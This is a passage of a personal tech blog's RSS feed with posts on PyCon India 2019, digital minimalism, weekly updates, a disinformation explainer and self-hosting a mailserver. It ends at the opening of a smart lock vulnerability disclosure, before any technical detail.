1315note. From what I counted, there were about 17 talks tagged under “Data
1316Science, Machine Learning and AI”. I’d have liked to see more talks
1317discussing security and privacy, but hey, the organizers can only pick
1318from what’s submitted. ;)</p>
1319
1320<p>With that point out of the way, here are some of the talks I really liked:</p>
1321
1322<ul>
1323<li><strong>Python Packaging - where we are and where we’re headed</strong> by <a href="https://twitter.com/pradyunsg">Pradyun</a></li>
1324<li><strong>Micropython: Building a Physical Inventory Search Engine</strong> by <a href="https://twitter.com/stonecharioteer">Vinay</a></li>
1325<li><strong>Ragabot - Music Encoded</strong> by <a href="https://twitter.com/vikipedia">Vikrant</a></li>
1326<li><strong>Let’s Hunt a Memory Leak</strong> by <a href="https://twitter.com/sankeyplus">Sanket</a></li>
1327<li>oh and of course, <a href="https://twitter.com/dabeaz">David Beazley</a>’s closing
1328keynote</li>
1329</ul>
1330
1331<h2 id="my-talk">My talk (!!!)</h2>
1332
1333<p>My good buddy <a href="https://twitter.com/_vologue">Raghav</a> and I spoke about
1334our smart lock security research. Agreed, it might have been less
1335“hardware” and more of a bug on the server-side, but that’s the thing
1336about IoT right? It’s so multi-faceted, and is an amalgamation of so
1337many different hardware and software stacks. But, anyway…</p>
1338
1339<p>I was reassured by folks after the talk that the silence during Q/A was
1340the “good” kind of silence. Was it really? I’ll never know.</p>
1341
1342<h2 id="some-nice-people-i-met">Some nice people I met</h2>
1343
1344<ul>
1345<li><a href="https://twitter.com/abhirathb">Abhirath</a>—A 200 IQ lad. Talked to
1346me about everything from computational biology to the physical
1347implementation of quantum computers.</li>
1348<li><a href="https://twitter.com/meain_">Abin</a>—He recognized me from my
1349<a href="https://reddit.com/r/unixporn">r/unixporn</a> posts, which was pretty
1350awesome.</li>
1351<li><a href="https://twitter.com/h6165">Abhishek</a></li>
1352<li>Pradyun and Vikrant (linked earlier)</li>
1353</ul>
1354
1355<p>And a lot of other people doing really great stuff, whose names I’m
1356forgetting.</p>
1357
1358<h2 id="pictures">Pictures!</h2>
1359
1360<p>It’s not much, and
1361I can’t be bothered to format them like a collage or whatever, so I’ll
1362just dump them here—as is.</p>
1363
1364<p><img src="/static/img/silly_badge.jpg" alt="nice badge" />
1365<img src="/static/img/abhishek_anmol.jpg" alt="awkward smile!" />
1366<img src="/static/img/me_talking.jpg" alt="me talking" />
1367<img src="/static/img/s443_pycon.jpg" alt="s443 @ pycon" /></p>
1368
1369<h2 id="cest-tout">C’est tout</h2>
1370
1371<p>Overall, a great time and a weekend well spent. It was very different
1372from your typical security conference—a lot more <em>chill</em>, if you
1373will. The organizers did a fantastic job and the entire event was put
1374together really well.
1375I don’t have much else to say, but I know for sure that I’ll be
1376there next time.</p>
1377
1378<p>That was PyCon India, 2019.</p>
1379]]></description><link>https://icyphox.sh/blog/pycon-wrap-up</link><pubDate>Tue, 15 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/pycon-wrap-up</guid></item><item><title>Thoughts on digital minimalism</title><description><![CDATA[<p>Ah yes, yet another article on the internet on this beaten to death
1380subject. But this is inherently different, since it’s <em>my</em> opinion on
1381the matter, and <em>my</em> technique(s) to achieve “digital minimalism”.</p>
1382
1383<p>According to me, minimalism can be achieved on two primary fronts –
1384the phone & the computer. Let’s start with the phone. The daily carry.
1385The device that’s on our person from when we get out of bed, till we get
1386back in bed.</p>
1387
1388<h2 id="the-phone">The phone</h2>
1389
1390<p>I’ve read about a lot of methods people employ to curb their phone
1391usage. Some have tried grouping “distracting” apps into a separate
1392folder, and this supposedly helps reduce their usage. Now, I fail to see
1393how this would work, but YMMV. Another technique I see often is using
1394a time governance app—like OnePlus’ Zen Mode—to enforce how much
1395time you spend using specific apps, or the phone itself. I’ve tried this
1396for myself, but I constantly found myself counting down the minutes
1397after which the phone would become usable again. Not helpful.</p>
1398
1399<p>My solution to this is a lot more brutal. I straight up uninstalled the
1400apps that I found myself using too often. There’s a simple principle
1401behind it—if the app has a desktop alternative, like Twitter,
1402Reddit, etc. use that instead. Here’s a list of apps that got nuked from
1403my phone:</p>
1404
1405<ul>
1406<li>Twitter</li>
1407<li>Instagram (an exception, no desktop client)</li>
1408<li>Relay for Reddit</li>
1409<li>YouTube (disabled, ships with stock OOS)</li>
1410</ul>
1411
1412<p>The only non-productive app that I’ve let remain is Clover,
1413a 4chan client. I didn’t find myself using it as much earlier, but we’ll see how that
1414holds up. I’ve also allowed my personal messaging apps to remain, since
1415removing those would be inconveniencing others.</p>
1416
1417<p>I must admit, I often find myself reaching for my phone out of habit
1418just to check Twitter, only to find that its gone. I also subconsciously
1419tap the place where its icon used to exist (now replaced with my mail
1420client) on my launcher. The only “fun” thing left on my phone to do is
1421read or listen to music. Which is okay, in my opinion.</p>
1422
1423<h2 id="the-computer">The computer</h2>
1424
1425<p>I didn’t do anything too nutty here, and most of the minimalism is
1426mostly aesthetic. I like UIs that get out of the way. </p>
1427
1428<p>My setup right now is just a simple bar at the top showing the time,
1429date, current volume and battery %, along with my workspace indicators.
1430No fancy colors, no flashy buttons and sliders. And that’s it. I don’t
1431try to force myself to not use stuff—after all, I’ve reduced it
1432elsewhere. :)</p>
1433
1434<p>Now the question arises: Is this just a phase, or will I stick to it?
1435What’s going to stop me from heading over to the Play Store and
1436installing those apps back? Well, I never said this was going to be
1437easy. There’s definitely some will power needed to pull this off.
1438I guess time will tell.</p>
1439]]></description><link>https://icyphox.sh/blog/digital-minimalism</link><pubDate>Sat, 05 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/digital-minimalism</guid></item><item><title>Weekly status update, 09/17–09/27</title><description><![CDATA[<p>It’s a lazy Friday afternoon here; yet another off day this week thanks to my
1440uni’s fest. My last “weekly” update was 10 days ago, and a lot has happened
1441since then. Let’s get right into it!</p>
1442
1443<h2 id="my-switch-to-alpine">My switch to Alpine</h2>
1444
1445<p>Previously, I ran Debian with Buster/Sid repos, and ever since this happened</p>
1446
1447<div class="codehilite"><pre><span></span><code>$ dpkg --list <span class="p">|</span> wc -l
1448<span class="m">3817</span>
1449
1450<span class="c1"># or something in that ballpark</span>
1451</code></pre></div>
1452
1453<p>I’ve been wanting to reduce my system’s package count.</p>
1454
1455<p>Thus, I began my search for a smaller, simpler and lighter distro with a fairly
1456sane package manager. I did come across Dylan Araps’
1457<a href="https://getkiss.org">KISS Linux</a> project, but it seemed a little too hands-on
1458for me (and still relatively new). I finally settled on
1459<a href="https://alpinelinux.org">Alpine Linux</a>. According to their website:</p>
1460
1461<blockquote>
1462 <p>Alpine Linux is a security-oriented, lightweight Linux distribution based
1463 on musl libc and busybox.</p>
1464</blockquote>
1465
1466<p>The installation was a breeze, and I was quite surprised to see WiFi working
1467OOTB. In the past week of my using this distro, the only major hassle I faced
1468was getting my Minecraft launcher to run. The JRE isn’t fully ported to <code>musl</code>
1469yet.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup> The solution to that is fairly trivial and I plan to write about it
1470soon. (hint: it involves chroots)</p>
1471
1472<p><img src="/static/img/rice-2019-09-27.png" alt="rice" /></p>
1473
1474<h2 id="packaging-for-alpine">Packaging for Alpine</h2>
1475
1476<p>On a related note, I’ve been busy packaging some of the stuff I use for Alpine
1477– you can see my personal <a href="https://github.com/icyphox/aports">aports</a>
1478repository if you’re interested. I’m currently working on packaging Nim too, so
1479keep an eye out for that in the coming week.</p>
1480
1481<h2 id="talk-selection-at-pycon-india">Talk selection at PyCon India!</h2>
1482
1483<p>Yes! My buddy Raghav (<a href="https://twitter.com/_vologue">@_vologue</a>) and I are
1484going to be speaking at PyCon India about our recent smart lock security
1485research. The conference is happening in Chennai, much to our convenience.
1486If you’re attending too, hit me up on Twitter and we can hang!</p>
1487
1488<h2 id="other">Other</h2>
1489
1490<p>That essentially sums up the <em>technical</em> stuff that I did. My Russian is going
1491strong, my reading however, hasn’t. I have <em>yet</em> to finish those books! This
1492week, for sure.</p>
1493
1494<p>Musically, I’ve been experimenting. I tried a bit of hip-hop and chilltrap, and
1495I think I like it? I still find myself coming back to metalcore/deathcore.
1496Here’s a list of artists I discovered (and liked) recently:</p>
1497
1498<ul>
1499<li><a href="https://www.youtube.com/watch?v=r3uKGwcwGWA">Before I Turn</a></li>
1500<li>生 Conform 死 (couldn’t find any official YouTube video, check Spotify)</li>
1501<li><a href="https://www.youtube.com/watch?v=66eFK1ttdC4">Treehouse Burning</a></li>
1502<li><a href="https://www.youtube.com/watch?v=m-w3XM2PwOY">Lee McKinney</a></li>
1503<li><a href="https://www.youtube.com/watch?v=cUibXK7F3PM">Berried Alive</a> (rediscovered)</li>
1504</ul>
1505
1506<p>That’s it for now, I’ll see you next week!</p>
1507
1508<div class="footnotes">
1509<hr />
1510<ol>
1511<li id="fn-1">
1512<p>The <a href="https://aboullaite.me/protola-alpine-java/">Portola Project</a> <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1513</li>
1514</ol>
1515</div>
1516]]></description><link>https://icyphox.sh/blog/2019-09-27</link><pubDate>Fri, 27 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-27</guid></item><item><title>Weekly status update, 09/08–09/17</title><description><![CDATA[<p>This is something new I’m trying out, in an effort to write more frequently
1517and to serve as a log of how I’m using my time. In theory, I will write this post
1518every week. I’ll need someone to hold me accountable if I don’t. I have yet to decide on
1519a format for this, but it will probably include a quick summary of the work I did,
1520things I read, IRL stuff, etc.</p>
1521
1522<p>With the meta stuff out of the way, here’s what went down last week!</p>
1523
1524<h2 id="my-discovery-of-the-xxiivv-webring">My discovery of the XXIIVV webring</h2>
1525
1526<p>Did you notice the new fidget-spinner-like logo at the bottom? Click it! It’s a link to
1527the <a href="https://webring.xxiivv.com">XXIIVV webring</a>. I really like the idea of webrings.
1528It creates a small community of sites and enables sharing of traffic among these sites.
1529The XXIIVV webring consists mostly of artists, designers and developers and gosh, some
1530of those sites are beautiful. Mine pales in comparison.</p>
1531
1532<p>The webring also has a <a href="https://github.com/buckket/twtxt">twtxt</a> echo chamber aptly
1533called <a href="https://webring.xxiivv.com/hallway.html">The Hallway</a>. twtxt is a fantastic project
1534and its complexity-to-usefulness ratio greatly impresses me. You can find my personal
1535twtxt feed at <code>/twtxt.txt</code> (root of this site).</p>
1536
1537<p>Which brings me to the next thing I did this/last week.</p>
1538
1539<h2 id="twsh-a-twtxt-client-written-in-bash"><code>twsh</code>: a twtxt client written in Bash</h2>
1540
1541<p>I’m not a fan of the official Python client, because you know, Python is bloat.
1542As an advocate of <em>mnmlsm</em>, I can’t use it in good conscience. Thus, began my
1543authorship of a truly mnml client in pure Bash. You can find it <a href="https://github.com/icyphox/twsh">here</a>.
1544It’s not entirely useable as of yet, but it’s definitely getting there, with the help
1545of <a href="https://nerdypepper.me">@nerdypepper</a>.</p>
1546
1547<h2 id="other">Other</h2>
1548
1549<p>I have been listening to my usual podcasts: Crime Junkie, True Crime Garage,
1550Darknet Diaries & Off the Pill. To add to this list, I’ve begun binging Vice’s CYBER.
1551It’s pretty good—each episode is only about 30 mins and it hits the sweet spot,
1552delvering both interesting security content and news.</p>
1553
1554<p>My reading needs a ton of catching up. Hopefully I’ll get around to finishing up
1555“The Unending Game” this week. And then go back to “Terrorism and Counterintelligence”.</p>
1556
1557<p>I’ve begun learning Russian! I’m really liking it so far, and it’s been surprisingly
1558easy to pick up. Learning the Cyrillic script will require some relearning, especially
1559with letters like в, н, р, с, etc. that look like English but sound entirely different.
1560I think I’m pretty serious about learning this language—I’ve added the Russian keyboard
1561to my Google Keyboard to aid in my familiarization of the alphabet. I’ve added the <code>RU</code>
1562layout to my keyboard map too:</p>
1563
1564<pre><code>setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru
1565</code></pre>
1566
1567<p>With that ends my weekly update, and I’ll see you next week!</p>
1568]]></description><link>https://icyphox.sh/blog/2019-09-17</link><pubDate>Tue, 17 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-17</guid></item><item><title>Disinformation demystified</title><description><![CDATA[<p>As with the disambiguation of any word, let’s start with its etymology and definiton.
1569According to <a href="https://en.wikipedia.org/wiki/Disinformation">Wikipedia</a>,
1570<em>disinformation</em> has been borrowed from the Russian word — <em>dezinformatisya</em> (дезинформа́ция),
1571derived from the title of a KGB black propaganda department.</p>
1572
1573<blockquote>
1574 <p>Disinformation is false information spread deliberately to deceive.</p>
1575</blockquote>
1576
1577<p>To fully understand disinformation, especially in the modern age, we need to understand the
1578key factors of any successful disinformation operation:</p>
1579
1580<ul>
1581<li>creating disinformation (what)</li>
1582<li>the motivation behind the op, or its end goal (why)</li>
1583<li>the medium used to disperse the falsified information (how)</li>
1584<li>the actor (who)</li>
1585</ul>
1586
1587<p>At the end, we’ll also look at how you can use disinformation techniques to maintain OPSEC.</p>
1588
1589<p>In order to break monotony, I will also be using the terms “information operation”, or the shortened
1590forms—"info op” & “disinfo”.</p>
1591
1592<h2 id="creating-disinformation">Creating disinformation</h2>
1593
1594<p>Crafting or creating disinformation is by no means a trivial task. Often, the quality
1595of any disinformation sample is a huge indicator of the level of sophistication of the
1596actor involved, i.e. is it a 12 year old troll or a nation state?</p>
1597
1598<p>Well crafted disinformation always has one primary characteristic — “plausibility”.
1599The disinfo must sound reasonable. It must induce the notion it’s <em>likely</em> true.
1600To achieve this, the target — be it an individual, a specific demographic or an entire
1601nation — must be well researched. A deep understanding of the target’s culture, history,
1602geography and psychology is required. It also needs circumstantial and situational awareness,
1603of the target.</p>
1604
1605<p>There are many forms of disinformation. A few common ones are staged videos / photographs,
1606recontextualized videos / photographs, blog posts, news articles & most recently — deepfakes.</p>
1607
1608<p>Here’s a tweet from <a href="https://twitter.com/thegrugq">the grugq</a>, showing a case of recontextualized
1609imagery:</p>
1610
1611<blockquote class="twitter-tweet" data-dnt="true" data-theme="dark" data-link-color="#00ffff">
1612<p lang="en" dir="ltr">Disinformation.
1613<br><br>
1614The content of the photo is not fake. The reality of what it captured is fake. The context it’s placed in is fake. The picture itself is 100% authentic. Everything, except the photo itself, is fake.
1615<br><br>Recontextualisation as threat vector.
1616<a href="https://t.co/Pko3f0xkXC">pic.twitter.com/Pko3f0xkXC</a>
1617</p>— thaddeus e. grugq (@thegrugq)
1618<a href="https://twitter.com/thegrugq/status/1142759819020890113?ref_src=twsrc%5Etfw">June 23, 2019</a>
1619</blockquote>
1620
1621<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
1622
1623<h2 id="motivations-behind-an-information-operation">Motivations behind an information operation</h2>
1624
1625<p>I like to broadly categorize any info op as either proactive or reactive.
1626Proactively, disinformation is spread with the desire to influence the target
1627either before or during the occurence of an event. This is especially observed
1628during elections.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup>
1629In offensive information operations, the target’s psychological state can be affected by
1630spreading <strong>fear, uncertainty & doubt</strong>, or FUD for short.</p>
1631
1632<p>Reactive disinformation is when the actor, usually a nation state in this case,
1633screws up and wants to cover their tracks. A fitting example of this is the case
1634of Malaysian Airlines Flight 17 (MH17), which was shot down while flying over
1635eastern Ukraine. This tragic incident has been attributed to Russian-backed
1636separatists.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>
1637Russian media is known to have desseminated a number of alternative & some even
1638conspiratorial theories<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, in response. The number grew as the JIT’s (Dutch-lead Joint
1639Investigation Team) investigations pointed towards the separatists.
1640The idea was to <strong>muddle the information</strong> space with these theories, and as a result,
1641potentially correct information takes a credibility hit.</p>
1642
1643<p>Another motive for an info op is to <strong>control the narrative</strong>. This is often seen in use
1644in totalitarian regimes; when the government decides what the media portrays to the
1645masses. The ongoing Hong Kong protests is a good example.<sup class="footnote-ref" id="fnref-4"><a href="#fn-4">4</a></sup> According to <a href="https://www.npr.org/2019/08/14/751039100/china-state-media-present-distorted-version-of-hong-kong-protests">NPR</a>:</p>
1646
1647<blockquote>
1648 <p>Official state media pin the blame for protests on the “black hand” of foreign interference,
1649 namely from the United States, and what they have called criminal Hong Kong thugs.
1650 A popular conspiracy theory posits the CIA incited and funded the Hong Kong protesters,
1651 who are demanding an end to an extradition bill with China and the ability to elect their own leader.
1652 Fueling this theory, China Daily, a state newspaper geared toward a younger, more cosmopolitan audience,
1653 this week linked to a video purportedly showing Hong Kong protesters using American-made grenade launchers to combat police.
1654 …</p>
1655</blockquote>
1656
1657<h2 id="media-used-to-disperse-disinfo">Media used to disperse disinfo</h2>
1658
1659<p>As seen in the above example of totalitarian governments, national TV and newspaper agencies
1660play a key role in influence ops en masse. It guarantees outreach due to the channel/paper’s
1661popularity.</p>
1662
1663<p>Twitter is another, obvious example. Due to the ease of creating accounts and the ability to
1664generate activity programmatically via the API, Twitter bots are the go-to choice today for
1665info ops. Essentially, an actor attempts to create “discussions” amongst “users” (read: bots),
1666to push their narrative(s). Twitter also provides analytics for every tweet, enabling actors to
1667get realtime insights into what sticks and what doesn’t.
1668The use of Twitter was seen during the previously discussed MH17 case, where Russia employed its troll
1669factory — the <a href="https://en.wikipedia.org/wiki/Internet_Research_Agency">Internet Research Agency</a> (IRA)
1670to create discussions about alternative theories.</p>
1671
1672<p>In India, disinformation is often spread via YouTube, WhatsApp and Facebook. Political parties
1673actively invest in creating group chats to spread political messages and memes. These parties
1674have volunteers whose sole job is to sit and forward messages.
1675Apart from political propaganda, WhatsApp finds itself as a medium of fake news. In most cases,
1676this is disinformation without a motive, or the motive is hard to determine simply because
1677the source is impossible to trace, lost in forwards.<sup class="footnote-ref" id="fnref-5"><a href="#fn-5">5</a></sup>
1678This is a difficult problem to combat, especially given the nature of the target audience.</p>
1679
1680<h2 id="the-actors-behind-disinfo-campaigns">The actors behind disinfo campaigns</h2>
1681
1682<p>I doubt this requires further elaboration, but in short:</p>
1683
1684<ul>
1685<li>nation states and their intelligence agencies</li>
1686<li>governments, political parties</li>
1687<li>other non/quasi-governmental groups</li>
1688<li>trolls</li>
1689</ul>
1690
1691<p>This essentially sums up the what, why, how and who of disinformation. </p>
1692
1693<h2 id="personal-opsec">Personal OPSEC</h2>
1694
1695<p>This is a fun one. Now, it’s common knowledge that
1696<strong>STFU is the best policy</strong>. But sometimes, this might not be possible, because
1697afterall inactivity leads to suspicion, and suspicion leads to scrutiny. Which might
1698lead to your OPSEC being compromised.
1699So if you really have to, you can feign activity using disinformation. For example,
1700pick a place, and throw in subtle details pertaining to the weather, local events
1701or regional politics of that place into your disinfo. Assuming this is Twitter, you can
1702tweet stuff like:</p>
1703
1704<ul>
1705<li>“Ugh, when will this hot streak end?!”</li>
1706<li>“Traffic wonky because of the Mardi Gras parade.”</li>
1707<li>“Woah, XYZ place is nice! Especially the fountains by ABC street.”</li>
1708</ul>
1709
1710<p>Of course, if you’re a nobody on Twitter (like me), this is a non-issue for you.</p>
1711
1712<p>And please, don’t do this:</p>
1713
1714<p><img src="/static/img/mcafeetweet.png" alt="mcafee opsecfail" /></p>
1715
1716<h2 id="conclusion">Conclusion</h2>
1717
1718<p>The ability to influence someone’s decisions/thought process in just one tweet is
1719scary. There is no simple way to combat disinformation. Social media is hard to control.
1720Just like anything else in cyber, this too is an endless battle between social media corps
1721and motivated actors.</p>
1722
1723<p>A huge shoutout to Bellingcat for their extensive research in this field, and for helping
1724folks see the truth in a post-truth world.</p>
1725
1726<div class="footnotes">
1727<hr />
1728<ol>
1729<li id="fn-1">
1730<p><a href="https://www.vice.com/en_us/article/ev3zmk/an-expert-explains-the-many-ways-our-elections-can-be-hacked">This</a> episode of CYBER talks about election influence ops (features the grugq!). <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1731</li>
1732
1733<li id="fn-2">
1734<p>The <a href="https://www.bellingcat.com/category/resources/podcasts/">Bellingcat Podcast</a>’s season one covers the MH17 investigation in detail. <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
1735</li>
1736
1737<li id="fn-3">
1738<p><a href="https://en.wikipedia.org/wiki/Malaysia_Airlines_Flight_17#Conspiracy_theories">Wikipedia section on MH17 conspiracy theories</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
1739</li>
1740
1741<li id="fn-4">
1742<p><a href="https://twitter.com/gdead/status/1171032265629032450">Chinese newspaper spreading disinfo</a> <a href="#fnref-4" class="footnoteBackLink" title="Jump back to footnote 4 in the text.">↩</a></p>
1743</li>
1744
1745<li id="fn-5">
1746<p>Use an adblocker before clicking <a href="https://www.news18.com/news/tech/fake-whatsapp-message-of-child-kidnaps-causing-mob-violence-in-madhya-pradesh-2252015.html">this</a>. <a href="#fnref-5" class="footnoteBackLink" title="Jump back to footnote 5 in the text.">↩</a></p>
1747</li>
1748</ol>
1749</div>
1750]]></description><link>https://icyphox.sh/blog/disinfo</link><pubDate>Tue, 10 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/disinfo</guid></item><item><title>Setting up my personal mailserver</title><description><![CDATA[<p>A mailserver was a long time coming. I’d made an attempt at setting one up
1751around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And
1752I almost did this time too.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
1753
1754<p>For this attempt, I wanted a simpler approach. I recall how terribly
1755confusing Dovecot & Postfix were to configure and hence I decided to look
1756for a containerized solution, that most importantly, runs on my cheap $5
1757Digital Ocean VPS — 1 vCPU and 1 GB memory. Of which only around 500 MB
1758is actually available. So yeah, <em>pretty</em> tight.</p>
1759
1760<h2 id="whats-available">What’s available</h2>
1761
1762<p>Turns out, there are quite a few of these OOTB, ready to deply solutions.
1763These are the ones I came across:</p>
1764
1765<ul>
1766<li><p><a href="https://poste.io">poste.io</a>: Based on an “open core” model. The base install is open source
1767and free (as in beer), but you’ll have to pay for the extra stuff.</p></li>
1768<li><p><a href="https://mailu.io">mailu.io</a>: Free software. Draws inspiration from poste.io,
1769but ships with a web UI that I didn’t need. </p></li>
1770<li><p><a href="https://mailcow.email">mailcow.email</a>: These fancy domains are getting ridiculous. But more importantly
1771they need 2 GiB of RAM <em>plus</em> swap?! Nope.</p></li>
1772<li><p><a href="https://mailinabox.email">Mail-in-a-Box</a>: Unlike the ones above, not a Docker-based solution but definitely worth
1773a mention. It however, needs a fresh box to work with. A box with absolutely
1774nothing else on it. I can’t afford to do that.</p></li>
1775<li><p><a href="https://github.com/tomav/docker-mailserver/">docker-mailserver</a>: <strong>The winner</strong>. </p></li>
1776</ul>
1777
1778<h2 id="so-docker-mailserver">So… <code>docker-mailserver</code></h2>
1779
1780<p>The first thing that caught my eye in the README:</p>
1781
1782<blockquote>
1783 <p>Recommended:</p>
1784
1785 <ul>
1786 <li>1 CPU</li>
1787 <li>1GB RAM</li>
1788 </ul>
1789
1790 <p>Minimum:</p>
1791
1792 <ul>
1793 <li>1 CPU</li>
1794 <li>512MB RAM</li>
1795 </ul>
1796</blockquote>
1797
1798<p>Fantastic, I can somehow squeeze this into my existing VPS.
1799Setup was fairly simple & the docs are pretty good. It employs a single
1800<code>.env</code> file for configuration, which is great.
1801However, I did run into a couple of hiccups here and there.</p>
1802
1803<p>One especially nasty one was <code>docker</code> / <code>docker-compose</code> running out
1804of memory.</p>
1805
1806<pre><code>Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill container 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI runtime state failed: runc did not terminate sucessfully: fatal error: runtime: out of memory
1807</code></pre>
1808
1809<p>But it eventually worked after a couple of attempts.</p>
1810
1811<p>The next thing I struggled with — DNS. Specifically, the with the step where
1812the DKIM keys are generated<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>. The output under <br />
1813<code>config/opendkim/keys/domain.tld/mail.txt</code> <br />
1814isn’t exactly CloudFlare friendly; they can’t be directly copy-pasted into
1815a <code>TXT</code> record. </p>
1816
1817<p>This is what it looks like.</p>
1818
1819<pre><code>mail._domainkey IN TXT ( "v=DKIM1; h=sha256; k=rsa; "
1820 "p=<key>"
1821 "<more key>" ) ; ----- DKIM key mail for icyphox.sh
1822</code></pre>
1823
1824<p>But while configuring the record, you set “Type” to <code>TXT</code>, “Name” to <code>mail._domainkey</code>,
1825and the “Value” to what’s inside the parenthesis <code>( )</code>, <em>removing</em> the quotes <code>""</code>.
1826Also remove the part that appears to be a comment <code>; ----- ...</code>.</p>
1827
1828<p>To simplify debugging DNS issues later, it’s probably a good idea to
1829point to your mailserver using a subdomain like <code>mail.domain.tld</code> using an
1830<code>A</code> record.
1831You’ll then have to set an <code>MX</code> record with the “Name” as <code>@</code> (or whatever your DNS provider
1832uses to denote the root domain) and the “Value” to <code>mail.domain.tld</code>.
1833And finally, the <code>PTR</code> (pointer record, I think), which is the reverse of
1834your <code>A</code> record — “Name” as the server IP and “Value” as <code>mail.domain.tld</code>.
1835I learnt this part the hard way, when my outgoing email kept getting
1836rejected by Tutanota’s servers.</p>
1837
1838<p>Yet another hurdle — SSL/TLS certificates. This isn’t very properly
1839documented, unless you read through the <a href="https://github.com/tomav/docker-mailserver/wiki/Installation-Examples">wiki</a>
1840and look at an example. In short, install <code>certbot</code>, have port 80 free,
1841and run </p>
1842
1843<div class="codehilite"><pre><span></span><code>$ certbot certonly --standalone -d mail.domain.tld
1844</code></pre></div>
1845
1846<p>Once that’s done, edit the <code>docker-compose.yml</code> file to mount <code>/etc/letsencrypt</code> in
1847the container, something like so:</p>
1848
1849<div class="codehilite"><pre><span></span><code><span class="nn">...</span>
1850
1851<span class="nt">volumes</span><span class="p">:</span>
1852 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">maildata:/var/mail</span>
1853 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">mailstate:/var/mail-state</span>
1854 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">./config/:/tmp/docker-mailserver/</span>
1855 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">/etc/letsencrypt:/etc/letsencrypt</span>
1856
1857<span class="nn">...</span>
1858</code></pre></div>
1859
1860<p>With this done, you shouldn’t have mail clients complaining about
1861wonky certs for which you’ll have to add an exception manually.</p>
1862
1863<h2 id="why-would-you">Why would you…?</h2>
1864
1865<p>There are a few good reasons for this:</p>
1866
1867<h3 id="privacy">Privacy</h3>
1868
1869<p>No really, this is <em>the</em> best choice for truly private
1870email. Not ProtonMail, not Tutanota. Sure, they claim so and I don’t
1871dispute it. Quoting Drew Devault<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>,</p>
1872
1873<blockquote>
1874 <p>Truly secure systems do not require you to trust the service provider.</p>
1875</blockquote>
1876
1877<p>But you have to <em>trust</em> ProtonMail. They run open source software, but
1878how can you really be sure that it isn’t a backdoored version of it?</p>
1879
1880<p>When you host your own mailserver, you truly own your email without having to rely on any
1881third-party.
1882This isn’t an attempt to spread FUD. In the end, it all depends on your
1883threat model™.</p>
1884
1885<h3 id="decentralization">Decentralization</h3>
1886
1887<p>Email today is basically run by Google. Gmail has over 1.2 <em>billion</em>
1888active users. That’s obscene.
1889Email was designed to be decentralized but big corps swooped in and
1890made it a product. They now control your data, and it isn’t unknown that
1891Google reads your mail. This again loops back to my previous point, privacy.
1892Decentralization guarantees privacy. When you control your mail, you subsequently
1893control who reads it.</p>
1894
1895<h3 id="personalization">Personalization</h3>
1896
1897<p>Can’t ignore this one. It’s cool to have a custom email address to flex.</p>
1898
1899<p><code>x@icyphox.sh</code> vs <code>gabe.newell4321@gmail.com</code></p>
1900
1901<p>Pfft, this is no competition.</p>
1902
1903<div class="footnotes">
1904<hr />
1905<ol>
1906<li id="fn-1">
1907<p>My <a href="https://twitter.com/icyphox/status/1161648321548566528">tweet</a> of frustration. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1908</li>
1909
1910<li id="fn-2">
1911<p><a href="https://github.com/tomav/docker-mailserver#generate-dkim-keys">Link</a> to step in the docs. <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
1912</li>
1913
1914<li id="fn-3">
1915<p>From his <a href="https://drewdevault.com/2018/08/08/Signal.html">article</a> on why he doesn’t trust Signal. <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
1916</li>
1917</ol>
1918</div>
1919]]></description><link>https://icyphox.sh/blog/mailserver</link><pubDate>Thu, 15 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mailserver</guid></item><item><title>Picking the FB50 smart lock (CVE-2019-13143)</title><description><![CDATA[<p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7’s Blog</a>, with my edits</em>)</p>
1920
1921<h2 id="the-lock">The lock</h2>
1922
1923<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
1924Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
1925across many ecommerce sites, and has over, an estimated, 15k+ users.</p>
1926
1927<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
1928the Play/App Store to function. The app requires the user to create an
1929account before further functionality is available.
1930It also facilitates configuring the fingerprint,
1931and unlocking from a range via Bluetooth.</p>
1932
1933<p>We had two primary attack surfaces we decided to tackle—Bluetooth (BLE)
1934and the Android app.</p>
1935
1936<h2 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h2>
1937
1938<p>Android phones have the ability to capture Bluetooth (HCI) traffic
1939which can be enabled under Developer Options under Settings. We made
1940around 4 “unlocks” from the Android phone, as seen in the screenshot.</p>
1941
